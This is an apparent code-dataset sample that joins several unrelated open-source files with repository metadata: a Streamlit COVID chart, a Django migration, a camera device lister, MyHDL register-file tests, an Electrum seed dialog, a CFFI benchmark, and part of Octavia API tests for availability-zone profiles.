1
|
2150
|
#! /usr/bin/env streamlit run
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
import datetime as dt
from altair import datum
from covid.us_cases_deaths import delta, get_cases_and_deaths, get_chart, smooth
import altair as alt
import streamlit as st
def _get_annotation(df):
# https://en.wikipedia.org/wiki/Sturgis_Motorcycle_Rally
rally = 1e3 * dt.datetime.strptime('2020-08-07', '%Y-%m-%d').timestamp()
ten_days = 10 * 1e3 * 86400
annotation = alt.Chart(df).mark_text(
align='left',
baseline='middle',
fontSize=20,
dx=7
).encode(
x='date',
y='val',
text='label'
).transform_filter(
(rally <= datum.date) & (datum.date < rally + ten_days)
)
return annotation
def main():
df = get_cases_and_deaths('us-states.csv', 'South Dakota')
df['label'] = '.'
st.altair_chart(get_chart(df) + _get_annotation(df))
st.altair_chart(get_chart(df, 'log') + _get_annotation(df))
delta(df)
smooth(df, span=7)
st.altair_chart(get_chart(df) + _get_annotation(df))
if __name__ == '__main__':
main()
|
mit
| -4,698,819,997,443,697,000
| 35.440678
| 80
| 0.695349
| false
| 3.536184
| false
| false
| false
|
spreeker/democracygame
|
democracy/issue/migrations/0002_auto__add_field_issue_slug.py
|
1
|
4992
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Issue.slug'
db.add_column('issue_issue', 'slug', self.gf('django.db.models.fields.SlugField')(max_length=80, null=True, db_index=True), keep_default=False)
def backwards(self, orm):
# Deleting field 'Issue.slug'
db.delete_column('issue_issue', 'slug')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'issue.issue': {
'Meta': {'object_name': 'Issue'},
'body': ('django.db.models.fields.TextField', [], {'max_length': '2000'}),
'hotness': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_draft': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'offensiveness': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '80', 'null': 'True', 'db_index': 'True'}),
'source_type': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'time_stamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2010, 9, 16, 14, 17, 28, 118475)'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'votes': ('django.db.models.fields.IntegerField', [], {'default': '0'})
}
}
complete_apps = ['issue']
|
bsd-3-clause
| -6,876,075,056,248,061,000
| 64.684211
| 182
| 0.553085
| false
| 3.692308
| false
| false
| false
|
TheImagingSource/tiscamera
|
examples/python/00-list-devices.py
|
1
|
2576
|
#!/usr/bin/env python3
# Copyright 2017 The Imaging Source Europe GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example will show you how to list information about the available devices
#
import sys
import gi
gi.require_version("Tcam", "0.1")
gi.require_version("Gst", "1.0")
from gi.repository import Tcam, Gst
def list_devices():
"""
Print information about all available devices
"""
sample_pipeline = Gst.parse_launch("tcambin name=source ! fakesink")
if not sample_pipeline:
print("Unable to create pipeline")
sys.exit(1)
source = sample_pipeline.get_by_name("source")
serials = source.get_device_serials_backend()
for single_serial in serials:
# This returns someting like:
# (True,
# name='DFK Z12GP031',
# identifier='The Imaging Source Europe GmbH-11410533',
# connection_type='aravis')
# The identifier is the name given by the backend
# The connection_type identifies the backend that is used.
# Currently 'aravis', 'v4l2', 'libusb' and 'unknown' exist
(return_value, model,
identifier, connection_type) = source.get_device_info(single_serial)
# return value would be False when a non-existant serial is used
# since we are iterating get_device_serials this should not happen
if return_value:
print("Model: {} Serial: {} Type: {}".format(model,
single_serial,
connection_type))
if __name__ == "__main__":
Gst.init(sys.argv) # init gstreamer
# this line sets the gstreamer default logging level
# it can be removed in normal applications
# gstreamer logging can contain verry useful information
# when debugging your application
# see https://gstreamer.freedesktop.org/documentation/tutorials/basic/debugging-tools.html
# for further details
Gst.debug_set_default_threshold(Gst.DebugLevel.WARNING)
list_devices()
|
apache-2.0
| -4,272,001,744,929,887,700
| 31.607595
| 94
| 0.660326
| false
| 4.043956
| false
| false
| false
|
cfelton/minnesota
|
test/test_system/test_regfile.py
|
1
|
7464
|
#
# Copyright (c) 2006-2013 Christopher L. Felton
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import collections
from random import randint
import traceback
from myhdl import *
from mn.system import Clock
from mn.system import Reset
from mn.system import Global
from mn.system import RegisterFile
from mn.system import Register
from mn.system import Wishbone
from mn.utils.test import *
regdef = None
regfile = None
def _create_mask(n):
m = 1
for _ in xrange(n):
m = (m << 1) | 1
return m
def _create_test_regfile():
global regdef
regdef = collections.OrderedDict()
# --register 0--
reg = Register('control', 0x0018, 8, 'rw', 0)
reg.comment = "register 0"
reg.add_named_bits('enable', slice(1, 0)) # read-only namedbit
reg.add_named_bits('loop', slice(2, 1)) # read-only namedbit
regdef[reg.name] = reg
# -- more registers register --
for addr,default in zip((0x20, 0x40, 0x80),
(0xDE, 0xCA, 0xFB)):
reg = Register('reg%s' % (addr,), addr, 8, 'rw', default)
regdef[reg.name] = reg
# -- read only register --
reg = Register('regro', 0x100, 8, 'ro', 0xAA)
regdef[reg.name] = reg
# another read only register, with named bits
reg = Register('status', 0x200, 8, 'ro', 0)
reg.add_named_bits('error', slice(1, 0)) # bit 0, read-write namedbit
reg.add_named_bits('ok', slice(2, 1)) # bit 1, read-write namedbit
reg.add_named_bits('cnt', slice(8, 2)) # bits 7-2, read-write namedbit
regdef[reg.name] = reg
regfile = RegisterFile(regdef)
return regfile
def m_per_top(clock, reset, mon):
glbl = Global(clock, reset)
wb = Wishbone(glbl)
#gpm = wb.m_controller(wb)
gp1 = m_per(glbl, wb, mon)
return gp1
def m_per(glbl, regbus, mon):
global regfile
regfile = _create_test_regfile()
g_regfile = regbus.m_per_interface(glbl, regfile)
clock, reset = glbl.clock, glbl.reset
## all "read-only" (status) bits if needed
@always_seq(clock.posedge, reset=reset)
def rtl_roregs():
if regfile.regro.rd:
regfile.regro.next = mon
return g_regfile #, rtl_roregs
def m_per_bits(glbl, regbus, mon):
global regfile
regfile = _create_test_regfile()
g_regfile = regbus.m_per_interface(glbl, regfile)
count = modbv(0, min=0, max=1)
clock, reset = glbl.clock, glbl.reset
## all "read-only" (status) bits if needed
@always(clock.posedge)
def rtl_roregs():
count[:] = count + 1
# only 'ro' registers can have named bits that can
# be set
if count:
regfile.error.next = True
regfile.ok.next = False
else:
regfile.error.next = False
regfile.ok.next = True
if regfile.regro.rd:
regfile.regro.next = mon
regfile.cnt.next = count[5:]
return g_regfile, rtl_roregs
def test_register_def():
regfile = _create_test_regfile()
assert len(regfile._rwregs) == 4
assert len(regfile._roregs) == 2
def test_register_file():
global regfile
# top-level signals and interfaces
clock = Clock(0, frequency=50e6)
reset = Reset(0, active=1, async=False)
glbl = Global(clock, reset)
regbus = Wishbone(glbl)
def _test_rf():
tb_dut = m_per(glbl, regbus, 0xAA)
tb_or = regbus.m_per_outputs()
tb_mclk = clock.gen()
tb_rclk = regbus.clk_i.gen()
asserr = Signal(bool(0))
@instance
def tb_stim():
try:
yield delay(100)
yield reset.pulse(111)
for k,reg in regdef.iteritems():
if reg.access == 'ro':
yield regbus.read(reg.addr)
rval = regbus.readval
assert rval == reg.default, "ro: %02x != %02x"%(rwd.rval,reg.default)
else:
wval = randint(0,(2**reg.width)-1)
yield regbus.write(reg.addr, wval)
for _ in xrange(4):
yield clock.posedge
yield regbus.read(reg.addr)
rval = regbus.readval
assert rval == wval, "rw: %02x != %02x"%(rwd.rval,rwd.wval)
yield delay(100)
except AssertionError,err:
print("@E: %s" % (err,))
traceback.print_exc()
asserr.next = True
for _ in xrange(10):
yield clock.posedge
raise err
raise StopSimulation
return tb_mclk, tb_stim, tb_dut, tb_or, tb_rclk
vcd = tb_clean_vcd('_test_rf')
traceSignals.name = vcd
g = traceSignals(_test_rf)
Simulation(g).run()
def test_register_file_bits():
global regfile
# top-level signals and interfaces
clock = Clock(0, frequency=50e6)
reset = Reset(0, active=1, async=False)
glbl = Global(clock, reset)
regbus = Wishbone(glbl)
def _test():
tb_dut = m_per_bits(glbl, regbus, 0xAA)
tb_or = regbus.m_per_outputs()
tb_mclk = clock.gen()
tb_rclk = regbus.clk_i.gen()
asserr = Signal(bool(0))
@instance
def tb_stim():
regfile.ok.next = True
try:
yield reset.pulse(111)
yield clock.posedge
yield clock.posedge
truefalse = True
yield regbus.write(regfile.control.addr, 0x01)
for _ in xrange(100):
assert (regfile.enable, regfile.loop) == (truefalse, not truefalse)
yield regbus.read(regfile.control.addr)
yield regbus.write(regfile.control.addr,
~regbus.readval)
truefalse = not truefalse
yield clock.posedge
except AssertionError, err:
asserr.next = True
for _ in xrange(20):
yield clock.posedge
raise err
raise StopSimulation
return tb_mclk, tb_stim, tb_dut, tb_or, tb_rclk
vcd = tb_clean_vcd('_test')
traceSignals.name = vcd
g = traceSignals(_test)
Simulation(g).run()
def test_convert():
clock = Signal(bool(0))
reset = ResetSignal(0, active=0, async=True)
mon = Signal(intbv(0)[8:])
toVerilog(m_per_top, clock, reset, mon)
toVHDL(m_per_top, clock, reset, mon)
if __name__ == '__main__':
#parser = tb_arparser()
#args = parser.parse_args()
test_register_def()
test_register_file()
test_register_file_bits()
test_convert()
|
gpl-3.0
| 6,406,166,799,250,013,000
| 28.975904
| 93
| 0.561763
| false
| 3.507519
| true
| false
| false
|
BlackhatEspeed/electrum
|
gui/qt/seed_dialog.py
|
1
|
3072
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2013 ecdsa@github
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
from electrum.i18n import _
from electrum import mnemonic
from qrcodewidget import QRCodeWidget, QRDialog
from util import close_button
from qrtextedit import ShowQRTextEdit, ScanQRTextEdit
class SeedDialog(QDialog):
def __init__(self, parent, seed, imported_keys):
QDialog.__init__(self, parent)
self.setModal(1)
self.setMinimumWidth(400)
self.setWindowTitle('Electrum' + ' - ' + _('Seed'))
vbox = show_seed_box_msg(seed)
if imported_keys:
vbox.addWidget(QLabel("<b>"+_("WARNING")+":</b> " + _("Your wallet contains imported keys. These keys cannot be recovered from seed.") + "</b><p>"))
vbox.addLayout(close_button(self))
self.setLayout(vbox)
def icon_filename(sid):
if sid == 'cold':
return ":icons/cold_seed.png"
elif sid == 'hot':
return ":icons/hot_seed.png"
else:
return ":icons/seed.png"
def show_seed_box_msg(seedphrase, sid=None):
msg = _("Your wallet generation seed is") + ":"
vbox = show_seed_box(msg, seedphrase, sid)
save_msg = _("Please save these %d words on paper (order is important).")%len(seedphrase.split()) + " "
msg2 = save_msg + " " \
+ _("This seed will allow you to recover your wallet in case of computer failure.") + "<br/>" \
+ "<b>"+_("WARNING")+":</b> " + _("Never disclose your seed. Never type it on a website.") + "</b><p>"
label2 = QLabel(msg2)
label2.setWordWrap(True)
vbox.addWidget(label2)
vbox.addStretch(1)
return vbox
def show_seed_box(msg, seed, sid):
vbox, seed_e = enter_seed_box(msg, None, sid=sid, text=seed)
return vbox
def enter_seed_box(msg, window, sid=None, text=None):
vbox = QVBoxLayout()
logo = QLabel()
logo.setPixmap(QPixmap(icon_filename(sid)).scaledToWidth(56))
logo.setMaximumWidth(60)
label = QLabel(msg)
label.setWordWrap(True)
if not text:
seed_e = ScanQRTextEdit(win=window)
seed_e.setTabChangesFocus(True)
else:
seed_e = ShowQRTextEdit(text=text)
seed_e.setMaximumHeight(130)
vbox.addWidget(label)
grid = QGridLayout()
grid.addWidget(logo, 0, 0)
grid.addWidget(seed_e, 0, 1)
vbox.addLayout(grid)
return vbox, seed_e
|
gpl-3.0
| 2,860,938,589,312,174,000
| 35.141176
| 160
| 0.66569
| false
| 3.455568
| false
| false
| false
|
tleonhardt/CodingPlayground
|
python/cffi/fibonacci/test_cffi.py
|
1
|
1755
|
#!/usr/bin/env python
""" Python wrapper to time the CFFI wrapper for computing the nth fibonacci number
in a non-recursive fashion and compare it to the pure Python implementation.
"""
import cffi
import fib_python
if __name__ == '__main__':
import sys
import timeit
n = 20
try:
n = int(sys.argv[1])
except Exception:
pass
number_of_times = 100000
try:
number_of_times = int(sys.argv[2])
except Exception:
pass
# The main top-level CFFI class that you instantiate once
ffi = cffi.FFI()
# Parses the given C source. This registers all declared functions.
ffi.cdef('int compute_fibonacci(int n);')
# Load and return a dynamic library. The standard C library can be loaded by passing None.
libfib = ffi.dlopen('./libfibonacci.so')
fib_py = fib_python.compute_fibonacci(n)
fib_cffi = libfib.compute_fibonacci(n)
if fib_py != fib_cffi:
raise(ValueError(fib_cffi))
py_tot = timeit.timeit("compute_fibonacci({})".format(n),
setup="from fib_python import compute_fibonacci",
number=number_of_times)
cffi_tot = timeit.timeit("libfib.compute_fibonacci({})".format(n),
setup="""import cffi; ffi = cffi.FFI(); ffi.cdef('int compute_fibonacci(int n);'); libfib = ffi.dlopen('./libfibonacci.so')""",
number=number_of_times)
py_avg = py_tot / number_of_times
cffi_avg = cffi_tot / number_of_times
print("fib({}) = {}".format(n, fib_py))
print("Python average time: {0:.2g}".format(py_avg))
print("CFFI/C average time: {0:.2g}".format(cffi_avg))
print("CFFI/C speedup: {0:.2g} times".format(py_avg/cffi_avg))
|
mit
| -701,642,183,918,904,800
| 34.1
| 154
| 0.612536
| false
| 3.25
| false
| false
| false
|
openstack/octavia
|
octavia/tests/functional/api/v2/test_availability_zone_profiles.py
|
1
|
29649
|
# Copyright 2019 Verizon Media
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_db import exception as odb_exceptions
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
class TestAvailabilityZoneProfiles(base.BaseAPITest):
root_tag = 'availability_zone_profile'
root_tag_list = 'availability_zone_profiles'
root_tag_links = 'availability_zone_profile_links'
def _assert_request_matches_response(self, req, resp, **optionals):
self.assertTrue(uuidutils.is_uuid_like(resp.get('id')))
self.assertEqual(req.get('name'), resp.get('name'))
self.assertEqual(req.get(constants.PROVIDER_NAME),
resp.get(constants.PROVIDER_NAME))
self.assertEqual(req.get(constants.AVAILABILITY_ZONE_DATA),
resp.get(constants.AVAILABILITY_ZONE_DATA))
def test_empty_list(self):
response = self.get(self.AZPS_PATH)
api_list = response.json.get(self.root_tag_list)
self.assertEqual([], api_list)
def test_create(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body)
api_azp = response.json.get(self.root_tag)
self._assert_request_matches_response(az_json, api_azp)
def test_create_with_missing_name(self):
az_json = {constants.PROVIDER_NAME: 'pr1',
constants.AVAILABILITY_ZONE_DATA: '{"x": "y"}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute name. Value: "
"'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_missing_provider(self):
az_json = {'name': 'xyz',
constants.AVAILABILITY_ZONE_DATA: '{"x": "y"}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute provider_name. "
"Value: 'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_missing_availability_zone_data(self):
az_json = {'name': 'xyz', constants.PROVIDER_NAME: 'pr1'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body, status=400)
err_msg = ("Invalid input for field/attribute availability_zone_data. "
"Value: 'None'. Mandatory field missing.")
self.assertEqual(err_msg, response.json.get('faultstring'))
def test_create_with_empty_availability_zone_data(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body)
api_azp = response.json.get(self.root_tag)
self._assert_request_matches_response(az_json, api_azp)
def test_create_with_long_name(self):
az_json = {'name': 'n' * 256, constants.PROVIDER_NAME: 'test1',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
self.post(self.AZPS_PATH, body, status=400)
def test_create_with_long_provider(self):
az_json = {'name': 'name1', constants.PROVIDER_NAME: 'n' * 256,
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
self.post(self.AZPS_PATH, body, status=400)
def test_create_with_long_availability_zone_data(self):
az_json = {'name': 'name1', constants.PROVIDER_NAME: 'amp',
constants.AVAILABILITY_ZONE_DATA: 'n' * 4097}
body = self._build_body(az_json)
self.post(self.AZPS_PATH, body, status=400)
def test_create_authorized(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.post(self.AZPS_PATH, body)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
api_azp = response.json.get(self.root_tag)
self._assert_request_matches_response(az_json, api_azp)
def test_create_not_authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
az_json = {'name': 'name',
constants.PROVIDER_NAME: 'xyz',
constants.AVAILABILITY_ZONE_DATA: '{"x": "y"}'}
body = self._build_body(az_json)
response = self.post(self.AZPS_PATH, body, status=403)
api_azp = response.json
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, api_azp)
def test_create_db_failure(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{"hello": "world"}'}
body = self._build_body(az_json)
with mock.patch(
"octavia.db.repositories.AvailabilityZoneProfileRepository."
"create") as mock_create:
mock_create.side_effect = Exception
self.post(self.AZPS_PATH, body, status=500)
mock_create.side_effect = odb_exceptions.DBDuplicateEntry
self.post(self.AZPS_PATH, body, status=409)
def test_create_with_invalid_json(self):
az_json = {'name': 'test1', constants.PROVIDER_NAME: 'noop_driver',
constants.AVAILABILITY_ZONE_DATA: '{hello: "world"}'}
body = self._build_body(az_json)
self.post(self.AZPS_PATH, body, status=400)
def test_get(self):
azp = self.create_availability_zone_profile(
'name', 'noop_driver', '{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
response = self.get(
self.AZP_PATH.format(
azp_id=azp.get('id'))).json.get(self.root_tag)
self.assertEqual('name', response.get('name'))
self.assertEqual(azp.get('id'), response.get('id'))
def test_get_one_deleted_id(self):
response = self.get(self.AZP_PATH.format(azp_id=constants.NIL_UUID),
status=404)
self.assertEqual('Availability Zone Profile {} not found.'.format(
constants.NIL_UUID), response.json.get('faultstring'))
def test_get_one_fields_filter(self):
azp = self.create_availability_zone_profile(
'name', 'noop_driver', '{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
response = self.get(
self.AZP_PATH.format(azp_id=azp.get('id')), params={
'fields': ['id', constants.PROVIDER_NAME]}
).json.get(self.root_tag)
self.assertEqual(azp.get('id'), response.get('id'))
self.assertIn(u'id', response)
self.assertIn(constants.PROVIDER_NAME, response)
self.assertNotIn(u'name', response)
self.assertNotIn(constants.AVAILABILITY_ZONE_DATA, response)
def test_get_authorized(self):
azp = self.create_availability_zone_profile(
'name', 'noop_driver', '{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(
self.AZP_PATH.format(
azp_id=azp.get('id'))).json.get(self.root_tag)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual('name', response.get('name'))
self.assertEqual(azp.get('id'), response.get('id'))
def test_get_not_authorized(self):
azp = self.create_availability_zone_profile(
'name', 'noop_driver', '{"x": "y"}')
self.assertTrue(uuidutils.is_uuid_like(azp.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
self.get(self.AZP_PATH.format(azp_id=azp.get('id')), status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_get_all(self):
fp1 = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
ref_fp_1 = {u'availability_zone_data': u'{"compute_zone": "my_az_1"}',
u'id': fp1.get('id'), u'name': u'test1',
constants.PROVIDER_NAME: u'noop_driver'}
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_availability_zone_profile(
'test2', 'noop_driver-alt', '{"compute_zone": "my_az_1"}')
ref_fp_2 = {u'availability_zone_data': u'{"compute_zone": "my_az_1"}',
u'id': fp2.get('id'), u'name': u'test2',
constants.PROVIDER_NAME: u'noop_driver-alt'}
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
response = self.get(self.AZPS_PATH)
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
self.assertIn(ref_fp_1, api_list)
self.assertIn(ref_fp_2, api_list)
def test_get_all_fields_filter(self):
fp1 = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_availability_zone_profile(
'test2', 'noop_driver-alt', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
response = self.get(self.AZPS_PATH, params={
'fields': ['id', 'name']})
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
for profile in api_list:
self.assertIn(u'id', profile)
self.assertIn(u'name', profile)
self.assertNotIn(constants.PROVIDER_NAME, profile)
self.assertNotIn(constants.AVAILABILITY_ZONE_DATA, profile)
def test_get_all_authorized(self):
fp1 = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_availability_zone_profile(
'test2', 'noop_driver-alt', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
project_id = uuidutils.generate_uuid()
with mock.patch.object(octavia.common.context.Context, 'project_id',
project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': True,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.AZPS_PATH)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
api_list = response.json.get(self.root_tag_list)
self.assertEqual(2, len(api_list))
def test_get_all_not_authorized(self):
fp1 = self.create_availability_zone_profile(
'test1', 'noop_driver', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp1.get('id')))
fp2 = self.create_availability_zone_profile(
'test2', 'noop_driver-alt', '{"compute_zone": "my_az_1"}')
self.assertTrue(uuidutils.is_uuid_like(fp2.get('id')))
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
